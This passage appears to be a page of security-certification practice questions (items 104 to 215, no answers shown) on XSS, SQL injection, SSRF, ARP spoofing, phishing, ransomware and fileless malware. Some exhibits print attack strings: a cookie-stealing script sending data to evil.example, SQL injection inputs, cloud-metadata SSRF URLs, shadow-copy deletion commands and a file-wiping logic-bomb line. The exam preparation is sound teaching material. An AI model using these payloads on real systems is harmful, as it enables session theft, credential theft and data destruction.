  allow tcp any any eq 554
Question 104easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user enters `<script>alert('test')</script>` into a public comment field, and other visitors see the script run in their browsers. What attack is this?

Question 105mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what network attack is most likely occurring on the office LAN?

Exhibit

Network capture summary:

Host 10.20.14.25 sends ARP requests for 10.20.14.1
Multiple ARP replies received:
10.20.14.1 is-at 02:42:ac:11:00:05
10.20.14.1 is-at 02:42:ac:11:00:05
10.20.14.1 is-at 66:77:88:99:aa:bb
Client gateway cache alternates between the legitimate gateway MAC and 66:77:88:99:aa:bb every few seconds.
Users report brief certificate warnings when opening internal sites.
Question 106hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SaaS portal issues signed JWTs in a browser cookie. The help desk confirms a user logged out at 09:10, but SIEM logs show the same token was accepted from a different IP at 09:12 and continued working until the token expired. The application does not keep a server-side revocation list. What weakness is most likely being abused?

Question 107easymulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives a text message from "IT Help" saying their account will be disabled unless they tap a link and enter a one-time code. Five minutes later, someone calls claiming to be from IT and asks the employee to read back the same code. Which two social engineering delivery methods are used? Select two.

Question 108mediummultiple choice
Read the full NAT/PAT explanation →

A customer service application shows the same session ID being used from two countries within five minutes. The legitimate user did not report a password change, but an order shipping address was modified successfully without reauthentication. What attack pattern is most likely?

Question 109easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After installing a free utility from an unofficial website, a user's laptop starts quietly sending browsing data to an unknown server. What type of malware is most likely present?

Question 110easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A vulnerability scan finds an administrative SSH service listening on 0.0.0.0 on a server that should be managed only from the internal network. What is the main security issue?

Question 111mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which malware type is most likely involved?

Exhibit

File server FS-02:

C:\Shared\Finance\Q4\APR_invoice.xlsx -> APR_invoice.xlsx.locked
C:\Shared\Finance\Q4\Budget2026.docx -> Budget2026.docx.locked
C:\Shared\Finance\Q4\README_RECOVER.txt created in every directory

Command history from the server console:
vssadmin delete shadows /all /quiet
wmic shadowcopy delete

Users report they can see filenames but cannot open the files.
Question 112hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A scan of a web server hosting an internal help-desk portal reports these findings: `/var/www/uploads` is world-writable by the application account, PHP files in that directory are executed by Apache, and the app allows users to upload images without content-type validation. Which issue should be remediated first to most reduce the chance of remote code execution?

Question 113easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify account details. The link opens a fake login page. What type of attack is this?

Question 114mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host makes periodic outbound connections to the same IP. Which malware characteristic is most likely?

Question 115mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a user installs a free PDF converter from an unofficial site, the browser homepage changes, the endpoint protection agent stops launching, and the system begins making periodic outbound connections to the same unfamiliar IP address. No exploit was used during installation, and the installer appeared legitimate. What type of malware best matches this behavior?

Question 116mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which social engineering attack is most likely?

Exhibit

From: BrightStone Invoices <billing@brightstone-payments.com>
Reply-To: Accounts Payable <ap@brightstone-invoices.net>
Subject: Updated remittance details for PO 44718

Hello Dana,

Please see the attached invoice addendum for the Orion office renovation project we completed last month. To avoid a late fee, send the balance today to the new bank account listed in the PDF.

Thank you,
BrightStone Billing
Question 117hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

EDR on a workstation shows winword.exe spawning powershell.exe with hidden, no-profile, and encoded arguments. No new executable is written to disk. Minutes later, a scheduled task creation is blocked, but the same host continues making HTTPS requests to a cloud IP address. Which malware category best fits this behavior?

Question 118easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file server suddenly renames documents with a new extension and displays a note demanding payment in cryptocurrency to restore access. What type of malware is most likely involved?

Question 119mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Users in a warehouse report an SMS claiming a missed delivery. The link opens a login page that closely matches the company portal, and several users later receive unauthorized password reset emails. What attack is most likely?

Question 120mediummultiple choice
Read the full wireless explanation →

During a conference, several employees connect to a wireless network named the same as the hotel's guest Wi-Fi. Shortly after connecting, they receive certificate warnings when accessing the company portal, and packet capture shows a nearby laptop advertising the same SSID and relaying traffic. What type of attack is most likely?

Question 121mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SOC analyst investigates a host after an employee opens an invoice attachment. The endpoint shows PowerShell running in a hidden window, no new executable files are created on disk, and the same suspicious activity returns after a reboot. What is the most likely attack type?

Question 122easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives a text message saying their payroll account is locked and asks them to tap a link and enter a one-time passcode. What type of attack is this?

Question 123easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A web login form returns access after a tester enters `' OR '1'='1'--` into the username field. What type of attack is this?

Question 124mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An accounts payable clerk receives an email that continues a real vendor conversation from last week. The sender domain is only one character different from the vendor's real address. The message says the invoice is overdue and asks the clerk to update the payment account before the end of the day. What is the best next action?

Question 125easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a user installs a free PDF converter from an unofficial website, the laptop starts making periodic outbound connections to an unknown server, the browser homepage changes, and a new program launches at logon. What is the most likely malware type?

Question 126hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A finance laptop is opened to review an invoice attachment. EDR then shows winword.exe launching powershell.exe with hidden, no-profile, and base64-encoded arguments. No executable is written to disk, network beacons begin from memory, and after a reboot the activity disappears unless the document is opened again. What type of malware behavior is most likely?

Question 127mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what vulnerability is the application most likely suffering from?

Exhibit

Support ticket excerpt:

A customer posted the following in a public product review field:
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>

The same script later appeared in the review page for other visitors, and the security team found several unexpected requests to the attacker-controlled domain.
Question 128mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After an endpoint cleanup, an EDR agent shows inconsistent results: a suspicious process does not appear in normal task listings, a file in System32 is hidden from user-mode tools, and some security logs stop recording events at the same time. Which malware type best matches these symptoms?

Question 129easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After installing a free PDF-to-Word utility from an unofficial website, a user's laptop starts sending data to an unknown server and the security agent is disabled. Which malware type best fits?

Question 130easymultiple choice
Read the full NAT/PAT explanation →

A customer enters `<script>alert('test')</script>` into a public forum signature field. Later, other users who view that signature see the script execute in their browsers. What attack is this?

Question 131easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives an email that appears to come from the payroll provider. The message says the employee's direct deposit will be suspended unless they verify their account through a link. What type of attack is this?

Question 132hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An accounts payable specialist receives a reply inside an existing vendor email thread. The message uses the real invoice number, matches the vendor's usual tone, and asks the specialist to change payment instructions to a new bank account before the end of the day. The vendor later confirms its mailbox was compromised. What type of attack is most likely?

Question 133mediummultiple choice
Read the full VPN explanation →

A VPN concentrator shows that an authentication request from a user was accepted twice, even though the user insists they approved only one login. Packet analysis reveals that the second successful attempt reused the same authentication blob and arrived shortly after the first. Which attack is the best fit?

Question 134mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A remote user's laptop begins launching a legitimate-looking "System Update" application at login. After the update window appears, the browser homepage changes, outbound traffic increases, and the user later reports that saved passwords are being used in unauthorized logins. Which malware type is the most likely primary infection?

Question 135hardmultiple choice
Open the full VLAN trunking answer →

A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE, but the distribution vendor note says the fix was backported. Port 8443 is bound to all interfaces, yet a firewall blocks it from the internet. The internal admin console on that port still uses the default admin/admin credentials and is reachable from the corporate VLAN. Which issue should be remediated first?

Question 136mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will be locked out unless they read back a one-time passcode, and leaves a callback number. What type of attack is this?

Question 137easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware type is most likely involved?

Question 138hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console fail to show the process that owns the socket. A reboot does not remove the issue, and firmware integrity checks pass. Which malware type is most likely installed?

Question 139mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A web application lets users save a profile "display name." One employee enters a value that contains script code, and later other users who view that profile start seeing pop-ups and redirects to a fake login page. Which attack is most likely occurring?

Question 140easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives a text message that says, "Your MFA enrollment expired. Tap here now to re-activate access or your account will be locked." What should the employee do first?

Question 141easymultiple choice
Read the full DNS explanation →

Users can reach the correct website name, but their browsers are redirected to a fake server after the local DNS cache is altered. What attack is most likely?

Question 142mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk agent receives a phone call from someone claiming to be a regional sales manager who says they are locked out before a customer demo. The caller knows a few employee names and asks the agent to reset the account and temporarily bypass MFA. What attack is most likely?

Question 143mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of malware is the most likely issue on the workstation?

Exhibit

Help desk incident notes:

- User installed a free video converter from an unofficial download site.
- Browser home page changed without permission.
- A new extension appeared named "QuickSearch Helper".
- Outbound traffic to tracking.example-cdn.net increased every few minutes.
- The endpoint security console reports that saved browser cookies were accessed by an unknown process.
Question 144mediummultiple choice
Study the full ACL explanation →

A vulnerability scan of a branch-office print server finds that its administrative web console is reachable from the internet. The appliance is still using the vendor's default password, and no access control list limits management access to the office subnet or VPN. Which remediation would reduce risk the most with the least disruption?

Question 145easymulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A small business web server still allows remote administration from the internet on port 3389, and the administrator password has never been changed from the vendor default. Which two issues should the security team prioritize first? Select two.

Question 146easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user opens an attached document, and the endpoint security tool shows PowerShell running from memory with no new executable file written to disk. What type of attack is most likely?

Question 147hardmultiple choice
Read the full NAT/PAT explanation →

An accounts payable clerk receives an email that appears to continue an existing thread with a shipping vendor. The sender name, signature block, and invoice number all match a real open order, and the message asks the clerk to use a "new payment portal" and confirm bank details before 3 PM to avoid delayed shipment. The email contains no attachments and only one URL. Which attack type is most likely?

Question 148mediummultiple choice
Review the full subnetting walkthrough →

A vulnerability scan finds that an administrative SSH service on a Linux server is listening on 0.0.0.0 and is reachable from the internet. The server is meant to be managed only from the internal admin subnet. What is the best remediation?

Question 149hardmultiple choice
Read the full VPN explanation →

A SaaS dashboard invalidates passwords after a forced reset, but a stolen bearer token from a browser cookie still works from a VPN exit node for several hours. SIEM logs show the same token value used from two countries within five minutes, and no MFA prompt appears because the token is already accepted. What attack is most likely?

Question 150easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A person wearing a contractor badge asks reception to let them into the office because they forgot their access card and say they are expected for a server maintenance visit. What social engineering technique is most likely?

Question 151easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives a phone call from someone claiming to be a contractor. The caller says their MFA app was lost, asks the technician to enroll a new device immediately, and pressures them to ignore policy. What type of attack is this?

Question 152hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A facilities manager receives an SMS from "FedEx Delivery" saying a shipment for the research lab cannot clear security until the recipient verifies the package by signing in. The message includes the manager's initials and the warehouse code, and the link opens a cloned sign-in page. Which attack is most likely?

Question 153mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A company portal lets employees save a short profile bio. One employee enters a string containing script code, and later other users who view that profile are redirected to a fake sign-in page. What vulnerability best explains this behavior?

Question 154mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A finance analyst receives an email that appears to come from the CFO. It references a real project, asks for an urgent wire transfer to a "new vendor account," and says to avoid the normal approval workflow because the deal is time-sensitive. What is the best immediate response?

Question 155mediummultiple choice
Read the full NAT/PAT explanation →

A Java-based internal portal accepts a serialized object during profile import. After a recent test upload, the server made outbound LDAP calls and created a new local account. What attack pattern best explains this behavior?

Question 156easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A login form sends user input directly into a database query. When a tester enters a single quote character, the application returns a database error. What attack is most likely?

Question 157mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of attack is most likely being used against the accounts payable team?

Exhibit

Email header excerpt:
From: "Evan Brooks" <evan.brooks@northstar-invoices.co>
To: ap-team@contoso.example
Subject: Updated pricing for Project Orion - action needed today

Message body:
Hi Lena,
Per our call last week about Project Orion, please review the revised pricing sheet attached.
The customer asked for approval before 3:00 PM so we can keep the launch on schedule.
If the file does not open, reply here and I will send a new link.
Question 158hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives a call from someone claiming to be a new contractor whose MFA app failed during travel. The caller knows the company org chart, names the technician's supervisor, and says the technician should use a callback number included in a text message they just sent. What is the safest first action?

Question 159mediummultiple choice
Review the full subnetting walkthrough →

Users on a wired subnet report intermittent outages when reaching an internal application. A packet capture shows the default gateway IP address repeatedly mapped to a different workstation MAC address, and traffic is being forwarded through that workstation. What attack is most likely occurring?

Question 160hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A Linux server is missing expected security-agent processes, but users can still connect to the application. Local command output does not show a suspicious daemon that another monitoring tool says is listening on port 4444. A raw disk scan reveals a kernel module loaded at boot, and several files appear only when viewed outside the normal operating system tools. What malware type is most likely?

Question 161easymulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user's workstation suddenly renames documents with a new extension, displays a ransom note, and blocks access to a shared drive. Which two indicators support ransomware? Select two.

Question 162hardmultiple choice
Open the full VLAN trunking answer →

Users on a branch VLAN intermittently reach a fake login page even though DNS records have not changed. A packet capture shows the default gateway MAC address changing every 60 seconds, and the switch logs list repeated unsolicited ARP replies from one workstation. Which attack is most likely?

Question 163hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A tester enters a crafted search term into an internal web application and sees no error message, but the page response always delays by exactly five seconds when the input includes a single quote followed by a conditional sleep function. The returned results look normal, so the tester repeats the request several times and the timing remains consistent. Which attack is most likely being attempted?

Question 164mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a workstation reboot, users see many files renamed with random extensions. A ransom note demands cryptocurrency, and Volume Shadow Copies were deleted from the machine. What malware type is most likely?

Question 165mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which security issue should the analyst report first?

Exhibit

External vulnerability scan summary for a small branch office server:

Host: 203.0.113.44
Open ports:
  22/tcp  open  ssh
  80/tcp  open  http
  5900/tcp open  vnc
Findings:
  - VNC authentication: disabled
  - SSH: restricted to password login only
  - Web admin page accessible from any source network
  - Server is in the DMZ and stores customer support tickets
Question 166mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a facilities outage, multiple employees report that their phones automatically joined a network named "CorpWiFi" in the lobby even though the legitimate access point was offline. A nearby attacker device then captured the captive portal login traffic. What attack is most likely?

Question 167hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which social engineering attack is most likely?

Exhibit

Help desk voicemail transcript:
'Hi, this is Elena from identity operations. I opened ticket INC-7712 because your MFA app is out of sync. Read me the 6-digit code that just arrived so I can clear the lockout before payroll closes.'
Ticketing system: no open ticket INC-7712 exists
Caller ID displayed: corporate main line
Question 168easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An EDR alert shows PowerShell launching from a scheduled task, downloading encoded commands, and running them in memory. No suspicious executable is written to disk. What kind of attack is this?

Question 169easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A laptop user reports that many files now have strange extensions, a ransom note appears on the desktop, and the files cannot be opened. Which malware is most likely responsible?

Question 170easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A caller says they are from IT support and asks a user to read back the one-time MFA code that just arrived on their phone. What type of attack is this most likely?

Question 171easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A vulnerability scanner reports a critical issue on a Linux server. The administrator checks the application and confirms the vulnerable package is installed, but the affected feature is not enabled anywhere in production. What should the security team do next?

Question 172easymultiple choice
Read the full wireless explanation →

Based on the exhibit, what wireless threat is most likely occurring?

Exhibit

Wireless scan from the lobby:
SSID: CorpWiFi       BSSID: 18:AA:10:22:44:60  Signal: -78 dBm
SSID: CorpWiFi       BSSID: 7C:22:90:11:33:AA  Signal: -41 dBm
SSID: CorpGuest      BSSID: 18:AA:10:22:44:61  Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."
Question 173mediummulti select
Open the full VLAN trunking answer →

Users on one VLAN report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows unsolicited ARP replies claiming to be the gateway. Which two actions are the best mitigations on managed switches? Select two.

Question 174mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which control should be enabled to mitigate this issue?

Exhibit

Packet Capture Summary
Host 10.20.30.44 sends repeated ARP replies:
  "10.20.30.1 is at 00:11:22:33:44:55"
  "10.20.30.1 is at 00:11:22:33:44:55"
Switch logs:
  DHCP snooping: disabled
  ARP inspection: disabled
Users report intermittent gateway connectivity and traffic sent to the wrong MAC address.
Question 175mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives a phone call from someone who claims to be the CFO. The caller knows the executive team structure, says they are traveling, and insists the technician reset MFA to 'avoid delaying a wire transfer.' Which social engineering technique is the caller primarily using?

Question 176easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of malware is most likely present?

Exhibit

Task Scheduler entry on FIN-SRV2:
Task Name: MonthlyCleanup
Trigger: 12/31/2026 18:00
Action: powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\cleanup.ps1
Script contents:
if ($env:USERNAME -eq 'j.smith') { Remove-Item C:\Finance\Archive\* -Recurse -Force }
Security note: The script was added by a former contractor before departure.
Question 177mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SOC analyst reviews an alert on a workstation where PowerShell launched from a scheduled task, downloaded an encoded command from a remote server, and then spawned rundll32.exe. Traditional antivirus did not flag any files on disk, and the activity stops after rebooting the host. Which type of malware behavior best fits this event?

Question 178easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives a call from a user who says many of their documents now have strange file extensions and a ransom note appeared on the desktop. The files will not open. What type of malware is the user most likely experiencing?

Question 179mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A cloud-hosted image-processing API accepts a URL parameter so it can download a picture and generate a thumbnail. Logs show a user submitting `http://169.254.169.254/latest/meta-data/` and receiving instance credentials in the response. Which attack is being used?

Question 180easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of threat is the security team most likely seeing on the workstation?

Exhibit

EDR Alert - WS-14
Time: 03:14:22
Parent process: svchost.exe
Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <redacted>
Network activity: HTTPS request to hxxps://updates-check[.]com/a7
File creation: none detected
Registry change: Run key modified under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Question 181mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives a phone call from someone who claims to be the CFO. The caller says they are traveling, cannot access their MFA app, and needs the technician to reset the account immediately. They also ask the technician to read back the one-time code sent to the executive's phone so they can "verify identity." What type of attack is this most likely?

Question 182mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A cloud-hosted application allows users to submit a URL for image processing. Logs show repeated requests such as `http://169.254.169.254/latest/meta-data/` and `http://localhost/admin`. The server is making outbound requests on behalf of the user input. What is the best defensive control to implement?

Question 183mediummultiple choice
Read the full DNS explanation →

A web service begins experiencing severe latency. Netflow shows thousands of short DNS queries leaving the attacker network, while a much larger volume of DNS responses is arriving at the victim’s public IP address from many open resolvers. Which attack is most likely occurring?

Question 184easymultiple choice
Read the full wireless explanation →

Employees in a lobby report that their phones automatically connected to a wireless network named "CorpWiFi." Soon after, they were prompted to sign in through a web page that did not look like the normal company portal. What attack is most likely?

Question 185easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee gets a text message saying their mobile carrier will suspend service unless they tap a link and verify their account details. What type of attack is this?

Question 186mediummultiple choice
Read the full DNS explanation →

A public website is overwhelmed by a flood of DNS responses arriving from many open resolvers after the attacker sends small forged queries to those resolvers. The target bandwidth is saturated and the source IPs vary widely. What kind of attack is being used?

Question 187mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives an SMS claiming to be from the mobile carrier. The message says the user's corporate number will be suspended unless they open a link and confirm an MFA code. The user has not reported any account issues. What attack is this?

Question 188easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A support portal has a search field that accepts customer last names. After a tester enters a single quote, the application returns a database syntax error. Which attack is the tester most likely trying to verify?

Question 189easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which attack is the developer most likely observing?

Exhibit

Application log excerpt:
GET /thumbnail?imageUrl=http://169.254.169.254/latest/meta-data/iam/security-credentials/
Response status: 200
Returned content includes cloud role names and temporary credentials metadata
Web server outbound connection recorded to the local metadata address
Question 190mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SOC analyst reviews an EDR alert on a finance workstation. The alert shows powershell.exe launched with an encoded command, downloaded a payload into memory, and then spawned rundll32.exe. No new executable was written to disk, but the process later created a scheduled task for persistence. Which two findings most strongly support a fileless attack? Select two.

Question 191mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security testing shows that if a user visits a malicious site while logged in, the portal will submit the transfer request without any additional verification. Which control would best reduce this risk?

Question 192easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unless they click a link and sign in within 30 minutes. What type of attack is this most likely?

Question 193mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.exe. No suspicious executable is written to disk, and the activity stops when the process ends. Which threat best fits this behavior?

Question 194easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A support portal searches customer records by last name. When a tester enters a single quote into the search field, the application returns a database syntax error. Which attack is most likely possible?

Question 195mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a routine dependency update, a development team notices that the customer portal begins making outbound connections to an unfamiliar domain during startup. The domain is not part of the application design, and the behavior started immediately after the third-party library was updated. Which threat is most likely?

Question 196mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Several employees in a branch office report that their laptops automatically connected to a network named "CorpWiFi" even though they were away from the office. Shortly afterward, a few users saw a captive portal asking them to re-enter company credentials. Which threat best explains this situation?

Question 197easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which supply-chain threat is most likely?

Exhibit

Build pipeline notes:
- Package manager updated dependency: "fast-logger" from 2.4.1 to 2.4.2
- New outbound connection at startup: api.fast-logger-support[.]com
- No code changes were made by the development team
- Security review note: "Dependency source is a recently created public repository account"
Question 198easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A development team updates a third-party software library used by its web application. After the release, new deployments begin making unexpected outbound connections to an unfamiliar domain. What type of threat is most likely?

Question 199mediummultiple choice
Read the full DNS explanation →

A public-facing web service suddenly becomes very slow. NetFlow shows a high volume of small DNS queries leaving attacker-controlled systems and much larger DNS responses arriving at the victim's IP address from many different resolvers. Which attack is taking place?

Question 200easymultiple choice
Read the full NAT/PAT explanation →

A security team can patch only one system today. Which asset should be remediated first?

Question 201mediummultiple choice
Read the full NAT/PAT explanation →

A scanner reports a critical vulnerability on an internal Linux server. The administrator confirms the vulnerable package is installed, but the affected feature is only enabled when an optional module is loaded, and that module is currently disabled. The server also requires downtime for patching. What is the best next step?

Question 202mediummultiple choice
Read the full NAT/PAT explanation →

A scanner reports a critical vulnerability on an internal Linux server. The administrator verifies the package is installed, but the vulnerable code path is only present in a plugin that has been disabled and removed from the service startup. The server cannot be patched until a vendor maintenance window next month. What is the best next step?

Question 203mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what is the most likely issue with the software component being built?

Exhibit

CI Build Output
Downloading package: report-utils@4.2.0
Expected integrity: sha512-F3d9e2f0e3a9c1...
Actual integrity:   sha512-7ab4d1c19f0a22...
Source registry: registry.example.net
Build status: WARN - package checksum mismatch
Developer note: The update was pulled automatically during the nightly pipeline.
Question 204hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which vulnerability is being exploited?

Exhibit

Reverse proxy config excerpt:
proxy_set_header X-Original-URL $request_uri;
proxy_set_header X-Forwarded-User $remote_user;

Access log:
GET /app/report HTTP/1.1 200
X-Original-URL: /admin/export
X-Forwarded-User: jlee

Backend log:
09:41:11 GET /admin/export user=jlee role=analyst response=200
09:41:13 POST /admin/export user=jlee role=analyst response=200
Question 205easymultiple choice
Read the full wireless explanation →

Employees in a lobby say their phones automatically connected to a wireless network named CorpWiFi, even though the legitimate access point was offline. They were then shown a fake sign-in page. What threat is this?

Question 206mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file-conversion API accepts a URL to generate a preview image. An attacker submits a URL for the cloud metadata service at 169.254.169.254 and receives instance credentials in the preview output. What attack is this?

Question 207mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An administrator notices that a finance file share remained normal for weeks after a former contractor left the company. This morning, multiple PDFs and spreadsheets were deleted, and a scheduled task created months ago is now executing a script that wipes files in the shared folder. Which malware type is most consistent with this behavior?

Question 208mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician receives a phone call from someone claiming to be the VP of Finance. The caller says they are in an airport, forgot their phone, and need a password reset immediately. They also ask the technician to skip callback verification because a meeting starts in five minutes. Which two details are the strongest indicators of a pretexting or vishing attempt? Select two.

Question 209hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which finding should be remediated first?

Exhibit

Vulnerability review summary:

Finding A: CVE-2025-1184 | DMZ web server | Internet-facing | Remote code execution | Exploit in the wild | Patch available
Finding B: CVE-2025-4420 | Engineering laptop | Internal-only lab VLAN | CVSS 9.8 | Requires local access | No network path
Finding C: CVE-2025-6011 | File server | Internal network | Requires authenticated user | Compensating ACL restricts access
Finding D: CVE-2025-7044 | Backup appliance | Internal network | No patch yet | Vendor says issue is unreachable from network
Question 210mediummultiple choice
Review the full subnetting walkthrough →

Several users on the same subnet report intermittent inability to reach the default gateway. A packet capture shows ARP replies mapping the gateway IP to a different MAC address, and the same host keeps sending those replies every few seconds. What attack is most likely?

Question 211hardmultiple choice
Read the full NAT/PAT explanation →

Based on the exhibit, what is the most likely explanation for the suspicious workstation activity?

Exhibit

EDR summary:
- Parent process: taskeng.exe
- Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ...
- No new executable files were created in user profile folders
- Scheduled task 'UpdateSvc' launches every 5 minutes
- Outbound TLS connections to 198.51.100.77 occur immediately after execution
Question 212mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A support portal searches customers by last name using a parameter called q. After one user enters a single quote, the app returns a SQL syntax error. A tester then submits `test' OR '1'='1` and sees every customer record. Which control most directly prevents this issue?

Question 213hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which attack is most likely occurring on the local network?

Exhibit

Host 192.0.2.45 arp -a
Internet Address      Physical Address      Type
192.0.2.1             00-50-56-a1-b2-c3     dynamic
192.0.2.1             00-50-56-a1-b2-c4     dynamic

Packet capture:
10:14:02 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4
10:14:03 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4
10:14:05 Gateway traffic is briefly forwarded to 192.0.2.200

Switch CAM table:
Gi1/0/7   00:50:56:a1:b2:c4
Gi1/0/24  00:50:56:a1:b2:c4
Question 214mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which attack is most likely being attempted against the application?

Exhibit

Web Access Log
2026-04-17T10:22:11Z "GET /thumb?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 512
2026-04-17T10:22:14Z "GET /thumb?url=http://10.0.5.14:8080/admin HTTP/1.1" 200 133
Application server outbound connections observed to internal RFC1918 addresses after each request.
Question 215mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

